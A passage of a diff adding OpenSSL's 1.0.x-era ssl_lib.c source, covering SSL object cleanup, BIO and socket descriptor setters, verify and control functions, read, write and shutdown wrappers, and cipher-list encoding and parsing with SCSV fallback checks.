+        SSL_CTX_free(s->initial_ctx);
+# ifndef OPENSSL_NO_EC
+    if (s->tlsext_ecpointformatlist)
+        OPENSSL_free(s->tlsext_ecpointformatlist);
+    if (s->tlsext_ellipticcurvelist)
+        OPENSSL_free(s->tlsext_ellipticcurvelist);
+# endif                         /* OPENSSL_NO_EC */
+    if (s->tlsext_opaque_prf_input)
+        OPENSSL_free(s->tlsext_opaque_prf_input);
+    if (s->tlsext_ocsp_exts)
+        sk_X509_EXTENSION_pop_free(s->tlsext_ocsp_exts, X509_EXTENSION_free);
+    if (s->tlsext_ocsp_ids)
+        sk_OCSP_RESPID_pop_free(s->tlsext_ocsp_ids, OCSP_RESPID_free);
+    if (s->tlsext_ocsp_resp)
+        OPENSSL_free(s->tlsext_ocsp_resp);
+    if (s->alpn_client_proto_list)
+        OPENSSL_free(s->alpn_client_proto_list);
+#endif
+
+    if (s->client_CA != NULL)
+        sk_X509_NAME_pop_free(s->client_CA, X509_NAME_free);
+
+    if (s->method != NULL)
+        s->method->ssl_free(s);
+
+    if (s->ctx)
+        SSL_CTX_free(s->ctx);
+
+#ifndef OPENSSL_NO_KRB5
+    if (s->kssl_ctx != NULL)
+        kssl_ctx_free(s->kssl_ctx);
+#endif                          /* OPENSSL_NO_KRB5 */
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+    if (s->next_proto_negotiated)
+        OPENSSL_free(s->next_proto_negotiated);
+#endif
+
+#ifndef OPENSSL_NO_SRTP
+    if (s->srtp_profiles)
+        sk_SRTP_PROTECTION_PROFILE_free(s->srtp_profiles);
+#endif
+
+    OPENSSL_free(s);
+}
+
+void SSL_set_bio(SSL *s, BIO *rbio, BIO *wbio)
+{
+    /*
+     * If the output buffering BIO is still in place, remove it
+     */
+    if (s->bbio != NULL) {
+        if (s->wbio == s->bbio) {
+            s->wbio = s->wbio->next_bio;
+            s->bbio->next_bio = NULL;
+        }
+    }
+    if ((s->rbio != NULL) && (s->rbio != rbio))
+        BIO_free_all(s->rbio);
+    if ((s->wbio != NULL) && (s->wbio != wbio) && (s->rbio != s->wbio))
+        BIO_free_all(s->wbio);
+    s->rbio = rbio;
+    s->wbio = wbio;
+}
+
+BIO *SSL_get_rbio(const SSL *s)
+{
+    return (s->rbio);
+}
+
+BIO *SSL_get_wbio(const SSL *s)
+{
+    return (s->wbio);
+}
+
+int SSL_get_fd(const SSL *s)
+{
+    return (SSL_get_rfd(s));
+}
+
+int SSL_get_rfd(const SSL *s)
+{
+    int ret = -1;
+    BIO *b, *r;
+
+    b = SSL_get_rbio(s);
+    r = BIO_find_type(b, BIO_TYPE_DESCRIPTOR);
+    if (r != NULL)
+        BIO_get_fd(r, &ret);
+    return (ret);
+}
+
+int SSL_get_wfd(const SSL *s)
+{
+    int ret = -1;
+    BIO *b, *r;
+
+    b = SSL_get_wbio(s);
+    r = BIO_find_type(b, BIO_TYPE_DESCRIPTOR);
+    if (r != NULL)
+        BIO_get_fd(r, &ret);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_SOCK
+int SSL_set_fd(SSL *s, int fd)
+{
+    int ret = 0;
+    BIO *bio = NULL;
+
+    bio = BIO_new(BIO_s_socket());
+
+    if (bio == NULL) {
+        SSLerr(SSL_F_SSL_SET_FD, ERR_R_BUF_LIB);
+        goto err;
+    }
+    BIO_set_fd(bio, fd, BIO_NOCLOSE);
+    SSL_set_bio(s, bio, bio);
+    ret = 1;
+ err:
+    return (ret);
+}
+
+int SSL_set_wfd(SSL *s, int fd)
+{
+    int ret = 0;
+    BIO *bio = NULL;
+
+    if ((s->rbio == NULL) || (BIO_method_type(s->rbio) != BIO_TYPE_SOCKET)
+        || ((int)BIO_get_fd(s->rbio, NULL) != fd)) {
+        bio = BIO_new(BIO_s_socket());
+
+        if (bio == NULL) {
+            SSLerr(SSL_F_SSL_SET_WFD, ERR_R_BUF_LIB);
+            goto err;
+        }
+        BIO_set_fd(bio, fd, BIO_NOCLOSE);
+        SSL_set_bio(s, SSL_get_rbio(s), bio);
+    } else
+        SSL_set_bio(s, SSL_get_rbio(s), SSL_get_rbio(s));
+    ret = 1;
+ err:
+    return (ret);
+}
+
+int SSL_set_rfd(SSL *s, int fd)
+{
+    int ret = 0;
+    BIO *bio = NULL;
+
+    if ((s->wbio == NULL) || (BIO_method_type(s->wbio) != BIO_TYPE_SOCKET)
+        || ((int)BIO_get_fd(s->wbio, NULL) != fd)) {
+        bio = BIO_new(BIO_s_socket());
+
+        if (bio == NULL) {
+            SSLerr(SSL_F_SSL_SET_RFD, ERR_R_BUF_LIB);
+            goto err;
+        }
+        BIO_set_fd(bio, fd, BIO_NOCLOSE);
+        SSL_set_bio(s, bio, SSL_get_wbio(s));
+    } else
+        SSL_set_bio(s, SSL_get_wbio(s), SSL_get_wbio(s));
+    ret = 1;
+ err:
+    return (ret);
+}
+#endif
+
+/* return length of latest Finished message we sent, copy to 'buf' */
+size_t SSL_get_finished(const SSL *s, void *buf, size_t count)
+{
+    size_t ret = 0;
+
+    if (s->s3 != NULL) {
+        ret = s->s3->tmp.finish_md_len;
+        if (count > ret)
+            count = ret;
+        memcpy(buf, s->s3->tmp.finish_md, count);
+    }
+    return ret;
+}
+
+/* return length of latest Finished message we expected, copy to 'buf' */
+size_t SSL_get_peer_finished(const SSL *s, void *buf, size_t count)
+{
+    size_t ret = 0;
+
+    if (s->s3 != NULL) {
+        ret = s->s3->tmp.peer_finish_md_len;
+        if (count > ret)
+            count = ret;
+        memcpy(buf, s->s3->tmp.peer_finish_md, count);
+    }
+    return ret;
+}
+
+int SSL_get_verify_mode(const SSL *s)
+{
+    return (s->verify_mode);
+}
+
+int SSL_get_verify_depth(const SSL *s)
+{
+    return X509_VERIFY_PARAM_get_depth(s->param);
+}
+
+int (*SSL_get_verify_callback(const SSL *s)) (int, X509_STORE_CTX *) {
+    return (s->verify_callback);
+}
+
+int SSL_CTX_get_verify_mode(const SSL_CTX *ctx)
+{
+    return (ctx->verify_mode);
+}
+
+int SSL_CTX_get_verify_depth(const SSL_CTX *ctx)
+{
+    return X509_VERIFY_PARAM_get_depth(ctx->param);
+}
+
+int (*SSL_CTX_get_verify_callback(const SSL_CTX *ctx)) (int, X509_STORE_CTX *) {
+    return (ctx->default_verify_callback);
+}
+
+void SSL_set_verify(SSL *s, int mode,
+                    int (*callback) (int ok, X509_STORE_CTX *ctx))
+{
+    s->verify_mode = mode;
+    if (callback != NULL)
+        s->verify_callback = callback;
+}
+
+void SSL_set_verify_depth(SSL *s, int depth)
+{
+    X509_VERIFY_PARAM_set_depth(s->param, depth);
+}
+
+void SSL_set_read_ahead(SSL *s, int yes)
+{
+    s->read_ahead = yes;
+}
+
+int SSL_get_read_ahead(const SSL *s)
+{
+    return (s->read_ahead);
+}
+
+int SSL_pending(const SSL *s)
+{
+    /*
+     * SSL_pending cannot work properly if read-ahead is enabled
+     * (SSL_[CTX_]ctrl(..., SSL_CTRL_SET_READ_AHEAD, 1, NULL)), and it is
+     * impossible to fix since SSL_pending cannot report errors that may be
+     * observed while scanning the new data. (Note that SSL_pending() is
+     * often used as a boolean value, so we'd better not return -1.)
+     */
+    return (s->method->ssl_pending(s));
+}
+
+X509 *SSL_get_peer_certificate(const SSL *s)
+{
+    X509 *r;
+
+    if ((s == NULL) || (s->session == NULL))
+        r = NULL;
+    else
+        r = s->session->peer;
+
+    if (r == NULL)
+        return (r);
+
+    CRYPTO_add(&r->references, 1, CRYPTO_LOCK_X509);
+
+    return (r);
+}
+
+STACK_OF(X509) *SSL_get_peer_cert_chain(const SSL *s)
+{
+    STACK_OF(X509) *r;
+
+    if ((s == NULL) || (s->session == NULL)
+        || (s->session->sess_cert == NULL))
+        r = NULL;
+    else
+        r = s->session->sess_cert->cert_chain;
+
+    /*
+     * If we are a client, cert_chain includes the peer's own certificate; if
+     * we are a server, it does not.
+     */
+
+    return (r);
+}
+
+/*
+ * Now in theory, since the calling process own 't' it should be safe to
+ * modify.  We need to be able to read f without being hassled
+ */
+void SSL_copy_session_id(SSL *t, const SSL *f)
+{
+    CERT *tmp;
+
+    /* Do we need to to SSL locking? */
+    SSL_set_session(t, SSL_get_session(f));
+
+    /*
+     * what if we are setup as SSLv2 but want to talk SSLv3 or vice-versa
+     */
+    if (t->method != f->method) {
+        t->method->ssl_free(t); /* cleanup current */
+        t->method = f->method;  /* change method */
+        t->method->ssl_new(t);  /* setup new */
+    }
+
+    tmp = t->cert;
+    if (f->cert != NULL) {
+        CRYPTO_add(&f->cert->references, 1, CRYPTO_LOCK_SSL_CERT);
+        t->cert = f->cert;
+    } else
+        t->cert = NULL;
+    if (tmp != NULL)
+        ssl_cert_free(tmp);
+    SSL_set_session_id_context(t, f->sid_ctx, f->sid_ctx_length);
+}
+
+/* Fix this so it checks all the valid key/cert options */
+int SSL_CTX_check_private_key(const SSL_CTX *ctx)
+{
+    if ((ctx == NULL) ||
+        (ctx->cert == NULL) || (ctx->cert->key->x509 == NULL)) {
+        SSLerr(SSL_F_SSL_CTX_CHECK_PRIVATE_KEY,
+               SSL_R_NO_CERTIFICATE_ASSIGNED);
+        return (0);
+    }
+    if (ctx->cert->key->privatekey == NULL) {
+        SSLerr(SSL_F_SSL_CTX_CHECK_PRIVATE_KEY,
+               SSL_R_NO_PRIVATE_KEY_ASSIGNED);
+        return (0);
+    }
+    return (X509_check_private_key
+            (ctx->cert->key->x509, ctx->cert->key->privatekey));
+}
+
+/* Fix this function so that it takes an optional type parameter */
+int SSL_check_private_key(const SSL *ssl)
+{
+    if (ssl == NULL) {
+        SSLerr(SSL_F_SSL_CHECK_PRIVATE_KEY, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (ssl->cert == NULL) {
+        SSLerr(SSL_F_SSL_CHECK_PRIVATE_KEY, SSL_R_NO_CERTIFICATE_ASSIGNED);
+        return 0;
+    }
+    if (ssl->cert->key->x509 == NULL) {
+        SSLerr(SSL_F_SSL_CHECK_PRIVATE_KEY, SSL_R_NO_CERTIFICATE_ASSIGNED);
+        return (0);
+    }
+    if (ssl->cert->key->privatekey == NULL) {
+        SSLerr(SSL_F_SSL_CHECK_PRIVATE_KEY, SSL_R_NO_PRIVATE_KEY_ASSIGNED);
+        return (0);
+    }
+    return (X509_check_private_key(ssl->cert->key->x509,
+                                   ssl->cert->key->privatekey));
+}
+
+int SSL_accept(SSL *s)
+{
+    if (s->handshake_func == 0)
+        /* Not properly initialized yet */
+        SSL_set_accept_state(s);
+
+    return (s->method->ssl_accept(s));
+}
+
+int SSL_connect(SSL *s)
+{
+    if (s->handshake_func == 0)
+        /* Not properly initialized yet */
+        SSL_set_connect_state(s);
+
+    return (s->method->ssl_connect(s));
+}
+
+long SSL_get_default_timeout(const SSL *s)
+{
+    return (s->method->get_timeout());
+}
+
+int SSL_read(SSL *s, void *buf, int num)
+{
+    if (s->handshake_func == 0) {
+        SSLerr(SSL_F_SSL_READ, SSL_R_UNINITIALIZED);
+        return -1;
+    }
+
+    if (s->shutdown & SSL_RECEIVED_SHUTDOWN) {
+        s->rwstate = SSL_NOTHING;
+        return (0);
+    }
+    return (s->method->ssl_read(s, buf, num));
+}
+
+int SSL_peek(SSL *s, void *buf, int num)
+{
+    if (s->handshake_func == 0) {
+        SSLerr(SSL_F_SSL_PEEK, SSL_R_UNINITIALIZED);
+        return -1;
+    }
+
+    if (s->shutdown & SSL_RECEIVED_SHUTDOWN) {
+        return (0);
+    }
+    return (s->method->ssl_peek(s, buf, num));
+}
+
+int SSL_write(SSL *s, const void *buf, int num)
+{
+    if (s->handshake_func == 0) {
+        SSLerr(SSL_F_SSL_WRITE, SSL_R_UNINITIALIZED);
+        return -1;
+    }
+
+    if (s->shutdown & SSL_SENT_SHUTDOWN) {
+        s->rwstate = SSL_NOTHING;
+        SSLerr(SSL_F_SSL_WRITE, SSL_R_PROTOCOL_IS_SHUTDOWN);
+        return (-1);
+    }
+    return (s->method->ssl_write(s, buf, num));
+}
+
+int SSL_shutdown(SSL *s)
+{
+    /*
+     * Note that this function behaves differently from what one might
+     * expect.  Return values are 0 for no success (yet), 1 for success; but
+     * calling it once is usually not enough, even if blocking I/O is used
+     * (see ssl3_shutdown).
+     */
+
+    if (s->handshake_func == 0) {
+        SSLerr(SSL_F_SSL_SHUTDOWN, SSL_R_UNINITIALIZED);
+        return -1;
+    }
+
+    if ((s != NULL) && !SSL_in_init(s))
+        return (s->method->ssl_shutdown(s));
+    else
+        return (1);
+}
+
+int SSL_renegotiate(SSL *s)
+{
+    if (s->renegotiate == 0)
+        s->renegotiate = 1;
+
+    s->new_session = 1;
+
+    return (s->method->ssl_renegotiate(s));
+}
+
+int SSL_renegotiate_abbreviated(SSL *s)
+{
+    if (s->renegotiate == 0)
+        s->renegotiate = 1;
+
+    s->new_session = 0;
+
+    return (s->method->ssl_renegotiate(s));
+}
+
+int SSL_renegotiate_pending(SSL *s)
+{
+    /*
+     * becomes true when negotiation is requested; false again once a
+     * handshake has finished
+     */
+    return (s->renegotiate != 0);
+}
+
+long SSL_ctrl(SSL *s, int cmd, long larg, void *parg)
+{
+    long l;
+
+    switch (cmd) {
+    case SSL_CTRL_GET_READ_AHEAD:
+        return (s->read_ahead);
+    case SSL_CTRL_SET_READ_AHEAD:
+        l = s->read_ahead;
+        s->read_ahead = larg;
+        return (l);
+
+    case SSL_CTRL_SET_MSG_CALLBACK_ARG:
+        s->msg_callback_arg = parg;
+        return 1;
+
+    case SSL_CTRL_OPTIONS:
+        return (s->options |= larg);
+    case SSL_CTRL_CLEAR_OPTIONS:
+        return (s->options &= ~larg);
+    case SSL_CTRL_MODE:
+        return (s->mode |= larg);
+    case SSL_CTRL_CLEAR_MODE:
+        return (s->mode &= ~larg);
+    case SSL_CTRL_GET_MAX_CERT_LIST:
+        return (s->max_cert_list);
+    case SSL_CTRL_SET_MAX_CERT_LIST:
+        l = s->max_cert_list;
+        s->max_cert_list = larg;
+        return (l);
+    case SSL_CTRL_SET_MAX_SEND_FRAGMENT:
+        if (larg < 512 || larg > SSL3_RT_MAX_PLAIN_LENGTH)
+            return 0;
+        s->max_send_fragment = larg;
+        return 1;
+    case SSL_CTRL_GET_RI_SUPPORT:
+        if (s->s3)
+            return s->s3->send_connection_binding;
+        else
+            return 0;
+    case SSL_CTRL_CERT_FLAGS:
+        return (s->cert->cert_flags |= larg);
+    case SSL_CTRL_CLEAR_CERT_FLAGS:
+        return (s->cert->cert_flags &= ~larg);
+
+    case SSL_CTRL_GET_RAW_CIPHERLIST:
+        if (parg) {
+            if (s->cert->ciphers_raw == NULL)
+                return 0;
+            *(unsigned char **)parg = s->cert->ciphers_raw;
+            return (int)s->cert->ciphers_rawlen;
+        } else
+            return ssl_put_cipher_by_char(s, NULL, NULL);
+    default:
+        return (s->method->ssl_ctrl(s, cmd, larg, parg));
+    }
+}
+
+long SSL_callback_ctrl(SSL *s, int cmd, void (*fp) (void))
+{
+    switch (cmd) {
+    case SSL_CTRL_SET_MSG_CALLBACK:
+        s->msg_callback = (void (*)
+                           (int write_p, int version, int content_type,
+                            const void *buf, size_t len, SSL *ssl,
+                            void *arg))(fp);
+        return 1;
+
+    default:
+        return (s->method->ssl_callback_ctrl(s, cmd, fp));
+    }
+}
+
+LHASH_OF(SSL_SESSION) *SSL_CTX_sessions(SSL_CTX *ctx)
+{
+    return ctx->sessions;
+}
+
+long SSL_CTX_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg)
+{
+    long l;
+    /* For some cases with ctx == NULL perform syntax checks */
+    if (ctx == NULL) {
+        switch (cmd) {
+#ifndef OPENSSL_NO_EC
+        case SSL_CTRL_SET_CURVES_LIST:
+            return tls1_set_curves_list(NULL, NULL, parg);
+#endif
+        case SSL_CTRL_SET_SIGALGS_LIST:
+        case SSL_CTRL_SET_CLIENT_SIGALGS_LIST:
+            return tls1_set_sigalgs_list(NULL, parg, 0);
+        default:
+            return 0;
+        }
+    }
+
+    switch (cmd) {
+    case SSL_CTRL_GET_READ_AHEAD:
+        return (ctx->read_ahead);
+    case SSL_CTRL_SET_READ_AHEAD:
+        l = ctx->read_ahead;
+        ctx->read_ahead = larg;
+        return (l);
+
+    case SSL_CTRL_SET_MSG_CALLBACK_ARG:
+        ctx->msg_callback_arg = parg;
+        return 1;
+
+    case SSL_CTRL_GET_MAX_CERT_LIST:
+        return (ctx->max_cert_list);
+    case SSL_CTRL_SET_MAX_CERT_LIST:
+        l = ctx->max_cert_list;
+        ctx->max_cert_list = larg;
+        return (l);
+
+    case SSL_CTRL_SET_SESS_CACHE_SIZE:
+        l = ctx->session_cache_size;
+        ctx->session_cache_size = larg;
+        return (l);
+    case SSL_CTRL_GET_SESS_CACHE_SIZE:
+        return (ctx->session_cache_size);
+    case SSL_CTRL_SET_SESS_CACHE_MODE:
+        l = ctx->session_cache_mode;
+        ctx->session_cache_mode = larg;
+        return (l);
+    case SSL_CTRL_GET_SESS_CACHE_MODE:
+        return (ctx->session_cache_mode);
+
+    case SSL_CTRL_SESS_NUMBER:
+        return (lh_SSL_SESSION_num_items(ctx->sessions));
+    case SSL_CTRL_SESS_CONNECT:
+        return (ctx->stats.sess_connect);
+    case SSL_CTRL_SESS_CONNECT_GOOD:
+        return (ctx->stats.sess_connect_good);
+    case SSL_CTRL_SESS_CONNECT_RENEGOTIATE:
+        return (ctx->stats.sess_connect_renegotiate);
+    case SSL_CTRL_SESS_ACCEPT:
+        return (ctx->stats.sess_accept);
+    case SSL_CTRL_SESS_ACCEPT_GOOD:
+        return (ctx->stats.sess_accept_good);
+    case SSL_CTRL_SESS_ACCEPT_RENEGOTIATE:
+        return (ctx->stats.sess_accept_renegotiate);
+    case SSL_CTRL_SESS_HIT:
+        return (ctx->stats.sess_hit);
+    case SSL_CTRL_SESS_CB_HIT:
+        return (ctx->stats.sess_cb_hit);
+    case SSL_CTRL_SESS_MISSES:
+        return (ctx->stats.sess_miss);
+    case SSL_CTRL_SESS_TIMEOUTS:
+        return (ctx->stats.sess_timeout);
+    case SSL_CTRL_SESS_CACHE_FULL:
+        return (ctx->stats.sess_cache_full);
+    case SSL_CTRL_OPTIONS:
+        return (ctx->options |= larg);
+    case SSL_CTRL_CLEAR_OPTIONS:
+        return (ctx->options &= ~larg);
+    case SSL_CTRL_MODE:
+        return (ctx->mode |= larg);
+    case SSL_CTRL_CLEAR_MODE:
+        return (ctx->mode &= ~larg);
+    case SSL_CTRL_SET_MAX_SEND_FRAGMENT:
+        if (larg < 512 || larg > SSL3_RT_MAX_PLAIN_LENGTH)
+            return 0;
+        ctx->max_send_fragment = larg;
+        return 1;
+    case SSL_CTRL_CERT_FLAGS:
+        return (ctx->cert->cert_flags |= larg);
+    case SSL_CTRL_CLEAR_CERT_FLAGS:
+        return (ctx->cert->cert_flags &= ~larg);
+    default:
+        return (ctx->method->ssl_ctx_ctrl(ctx, cmd, larg, parg));
+    }
+}
+
+long SSL_CTX_callback_ctrl(SSL_CTX *ctx, int cmd, void (*fp) (void))
+{
+    switch (cmd) {
+    case SSL_CTRL_SET_MSG_CALLBACK:
+        ctx->msg_callback = (void (*)
+                             (int write_p, int version, int content_type,
+                              const void *buf, size_t len, SSL *ssl,
+                              void *arg))(fp);
+        return 1;
+
+    default:
+        return (ctx->method->ssl_ctx_callback_ctrl(ctx, cmd, fp));
+    }
+}
+
+int ssl_cipher_id_cmp(const SSL_CIPHER *a, const SSL_CIPHER *b)
+{
+    long l;
+
+    l = a->id - b->id;
+    if (l == 0L)
+        return (0);
+    else
+        return ((l > 0) ? 1 : -1);
+}
+
+int ssl_cipher_ptr_id_cmp(const SSL_CIPHER *const *ap,
+                          const SSL_CIPHER *const *bp)
+{
+    long l;
+
+    l = (*ap)->id - (*bp)->id;
+    if (l == 0L)
+        return (0);
+    else
+        return ((l > 0) ? 1 : -1);
+}
+
+/** return a STACK of the ciphers available for the SSL and in order of
+ * preference */
+STACK_OF(SSL_CIPHER) *SSL_get_ciphers(const SSL *s)
+{
+    if (s != NULL) {
+        if (s->cipher_list != NULL) {
+            return (s->cipher_list);
+        } else if ((s->ctx != NULL) && (s->ctx->cipher_list != NULL)) {
+            return (s->ctx->cipher_list);
+        }
+    }
+    return (NULL);
+}
+
+/** return a STACK of the ciphers available for the SSL and in order of
+ * algorithm id */
+STACK_OF(SSL_CIPHER) *ssl_get_ciphers_by_id(SSL *s)
+{
+    if (s != NULL) {
+        if (s->cipher_list_by_id != NULL) {
+            return (s->cipher_list_by_id);
+        } else if ((s->ctx != NULL) && (s->ctx->cipher_list_by_id != NULL)) {
+            return (s->ctx->cipher_list_by_id);
+        }
+    }
+    return (NULL);
+}
+
+/** The old interface to get the same thing as SSL_get_ciphers() */
+const char *SSL_get_cipher_list(const SSL *s, int n)
+{
+    SSL_CIPHER *c;
+    STACK_OF(SSL_CIPHER) *sk;
+
+    if (s == NULL)
+        return (NULL);
+    sk = SSL_get_ciphers(s);
+    if ((sk == NULL) || (sk_SSL_CIPHER_num(sk) <= n))
+        return (NULL);
+    c = sk_SSL_CIPHER_value(sk, n);
+    if (c == NULL)
+        return (NULL);
+    return (c->name);
+}
+
+/** specify the ciphers to be used by default by the SSL_CTX */
+int SSL_CTX_set_cipher_list(SSL_CTX *ctx, const char *str)
+{
+    STACK_OF(SSL_CIPHER) *sk;
+
+    sk = ssl_create_cipher_list(ctx->method, &ctx->cipher_list,
+                                &ctx->cipher_list_by_id, str, ctx->cert);
+    /*
+     * ssl_create_cipher_list may return an empty stack if it was unable to
+     * find a cipher matching the given rule string (for example if the rule
+     * string specifies a cipher which has been disabled). This is not an
+     * error as far as ssl_create_cipher_list is concerned, and hence
+     * ctx->cipher_list and ctx->cipher_list_by_id has been updated.
+     */
+    if (sk == NULL)
+        return 0;
+    else if (sk_SSL_CIPHER_num(sk) == 0) {
+        SSLerr(SSL_F_SSL_CTX_SET_CIPHER_LIST, SSL_R_NO_CIPHER_MATCH);
+        return 0;
+    }
+    return 1;
+}
+
+/** specify the ciphers to be used by the SSL */
+int SSL_set_cipher_list(SSL *s, const char *str)
+{
+    STACK_OF(SSL_CIPHER) *sk;
+
+    sk = ssl_create_cipher_list(s->ctx->method, &s->cipher_list,
+                                &s->cipher_list_by_id, str, s->cert);
+    /* see comment in SSL_CTX_set_cipher_list */
+    if (sk == NULL)
+        return 0;
+    else if (sk_SSL_CIPHER_num(sk) == 0) {
+        SSLerr(SSL_F_SSL_SET_CIPHER_LIST, SSL_R_NO_CIPHER_MATCH);
+        return 0;
+    }
+    return 1;
+}
+
+/* works well for SSLv2, not so good for SSLv3 */
+char *SSL_get_shared_ciphers(const SSL *s, char *buf, int len)
+{
+    char *p;
+    STACK_OF(SSL_CIPHER) *sk;
+    SSL_CIPHER *c;
+    int i;
+
+    if ((s->session == NULL) || (s->session->ciphers == NULL) || (len < 2))
+        return (NULL);
+
+    p = buf;
+    sk = s->session->ciphers;
+
+    if (sk_SSL_CIPHER_num(sk) == 0)
+        return NULL;
+
+    for (i = 0; i < sk_SSL_CIPHER_num(sk); i++) {
+        int n;
+
+        c = sk_SSL_CIPHER_value(sk, i);
+        n = strlen(c->name);
+        if (n + 1 > len) {
+            if (p != buf)
+                --p;
+            *p = '\0';
+            return buf;
+        }
+        strcpy(p, c->name);
+        p += n;
+        *(p++) = ':';
+        len -= n + 1;
+    }
+    p[-1] = '\0';
+    return (buf);
+}
+
+int ssl_cipher_list_to_bytes(SSL *s, STACK_OF(SSL_CIPHER) *sk,
+                             unsigned char *p,
+                             int (*put_cb) (const SSL_CIPHER *,
+                                            unsigned char *))
+{
+    int i, j = 0;
+    SSL_CIPHER *c;
+    CERT *ct = s->cert;
+    unsigned char *q;
+    int empty_reneg_info_scsv = !s->renegotiate;
+    /* Set disabled masks for this session */
+    ssl_set_client_disabled(s);
+
+    if (sk == NULL)
+        return (0);
+    q = p;
+    if (put_cb == NULL)
+        put_cb = s->method->put_cipher_by_char;
+
+    for (i = 0; i < sk_SSL_CIPHER_num(sk); i++) {
+        c = sk_SSL_CIPHER_value(sk, i);
+        /* Skip disabled ciphers */
+        if (c->algorithm_ssl & ct->mask_ssl ||
+            c->algorithm_mkey & ct->mask_k || c->algorithm_auth & ct->mask_a)
+            continue;
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+        if (c->id == SSL3_CK_SCSV) {
+            if (!empty_reneg_info_scsv)
+                continue;
+            else
+                empty_reneg_info_scsv = 0;
+        }
+#endif
+        j = put_cb(c, p);
+        p += j;
+    }
+    /*
+     * If p == q, no ciphers; caller indicates an error. Otherwise, add
+     * applicable SCSVs.
+     */
+    if (p != q) {
+        if (empty_reneg_info_scsv) {
+            static SSL_CIPHER scsv = {
+                0, NULL, SSL3_CK_SCSV, 0, 0, 0, 0, 0, 0, 0, 0, 0
+            };
+            j = put_cb(&scsv, p);
+            p += j;
+#ifdef OPENSSL_RI_DEBUG
+            fprintf(stderr,
+                    "TLS_EMPTY_RENEGOTIATION_INFO_SCSV sent by client\n");
+#endif
+        }
+        if (s->mode & SSL_MODE_SEND_FALLBACK_SCSV) {
+            static SSL_CIPHER scsv = {
+                0, NULL, SSL3_CK_FALLBACK_SCSV, 0, 0, 0, 0, 0, 0, 0, 0, 0
+            };
+            j = put_cb(&scsv, p);
+            p += j;
+        }
+    }
+
+    return (p - q);
+}
+
+STACK_OF(SSL_CIPHER) *ssl_bytes_to_cipher_list(SSL *s, unsigned char *p,
+                                               int num,
+                                               STACK_OF(SSL_CIPHER) **skp)
+{
+    const SSL_CIPHER *c;
+    STACK_OF(SSL_CIPHER) *sk;
+    int i, n;
+
+    if (s->s3)
+        s->s3->send_connection_binding = 0;
+
+    n = ssl_put_cipher_by_char(s, NULL, NULL);
+    if (n == 0 || (num % n) != 0) {
+        SSLerr(SSL_F_SSL_BYTES_TO_CIPHER_LIST,
+               SSL_R_ERROR_IN_RECEIVED_CIPHER_LIST);
+        return (NULL);
+    }
+    if ((skp == NULL) || (*skp == NULL))
+        sk = sk_SSL_CIPHER_new_null(); /* change perhaps later */
+    else {
+        sk = *skp;
+        sk_SSL_CIPHER_zero(sk);
+    }
+
+    if (s->cert->ciphers_raw)
+        OPENSSL_free(s->cert->ciphers_raw);
+    s->cert->ciphers_raw = BUF_memdup(p, num);
+    if (s->cert->ciphers_raw == NULL) {
+        SSLerr(SSL_F_SSL_BYTES_TO_CIPHER_LIST, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    s->cert->ciphers_rawlen = (size_t)num;
+
+    for (i = 0; i < num; i += n) {
+        /* Check for TLS_EMPTY_RENEGOTIATION_INFO_SCSV */
+        if (s->s3 && (n != 3 || !p[0]) &&
+            (p[n - 2] == ((SSL3_CK_SCSV >> 8) & 0xff)) &&
+            (p[n - 1] == (SSL3_CK_SCSV & 0xff))) {
+            /* SCSV fatal if renegotiating */
+            if (s->renegotiate) {
+                SSLerr(SSL_F_SSL_BYTES_TO_CIPHER_LIST,
+                       SSL_R_SCSV_RECEIVED_WHEN_RENEGOTIATING);
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
+                goto err;
+            }
+            s->s3->send_connection_binding = 1;
+            p += n;
+#ifdef OPENSSL_RI_DEBUG
+            fprintf(stderr, "SCSV received by server\n");
+#endif
+            continue;
+        }
+
+        /* Check for TLS_FALLBACK_SCSV */
+        if ((n != 3 || !p[0]) &&
+            (p[n - 2] == ((SSL3_CK_FALLBACK_SCSV >> 8) & 0xff)) &&
+            (p[n - 1] == (SSL3_CK_FALLBACK_SCSV & 0xff))) {
+            /*
+             * The SCSV indicates that the client previously tried a higher
+             * version. Fail if the current version is an unexpected
+             * downgrade.
+             */
+            if (!SSL_ctrl(s, SSL_CTRL_CHECK_PROTO_VERSION, 0, NULL)) {
+                SSLerr(SSL_F_SSL_BYTES_TO_CIPHER_LIST,
+                       SSL_R_INAPPROPRIATE_FALLBACK);
+                if (s->s3)
+                    ssl3_send_alert(s, SSL3_AL_FATAL,
+                                    SSL_AD_INAPPROPRIATE_FALLBACK);
+                goto err;
+            }
+            p += n;
+            continue;
+        }
+
+        c = ssl_get_cipher_by_char(s, p);
+        p += n;
+        if (c != NULL) {
+            if (!sk_SSL_CIPHER_push(sk, c)) {
+                SSLerr(SSL_F_SSL_BYTES_TO_CIPHER_LIST, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+        }
+    }
+
+    if (skp != NULL)
+        *skp = sk;
+    return (sk);
+ err:
+    if ((skp == NULL) || (*skp == NULL))
+        sk_SSL_CIPHER_free(sk);
+    return (NULL);
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+/** return a servername extension value if provided in Client Hello, or NULL.
+ * So far, only host_name types are defined (RFC 3546).
+ */
+
+const char *SSL_get_servername(const SSL *s, const int type)
+{
+    if (type != TLSEXT_NAMETYPE_host_name)
+        return NULL;
+
+    return s->session && !s->tlsext_hostname ?
+        s->session->tlsext_hostname : s->tlsext_hostname;
+}
+
+int SSL_get_servername_type(const SSL *s)
+{
+    if (s->session
+        && (!s->tlsext_hostname ? s->session->
+            tlsext_hostname : s->tlsext_hostname))
+        return TLSEXT_NAMETYPE_host_name;
+    return -1;
+}
+
+/*
+ * SSL_select_next_proto implements the standard protocol selection. It is
+ * expected that this function is called from the callback set by
+ * SSL_CTX_set_next_proto_select_cb. The protocol data is assumed to be a
+ * vector of 8-bit, length prefixed byte strings. The length byte itself is
+ * not included in the length. A byte string of length 0 is invalid. No byte
+ * string may be truncated. The current, but experimental algorithm for
+ * selecting the protocol is: 1) If the server doesn't support NPN then this
+ * is indicated to the callback. In this case, the client application has to
+ * abort the connection or have a default application level protocol. 2) If
+ * the server supports NPN, but advertises an empty list then the client
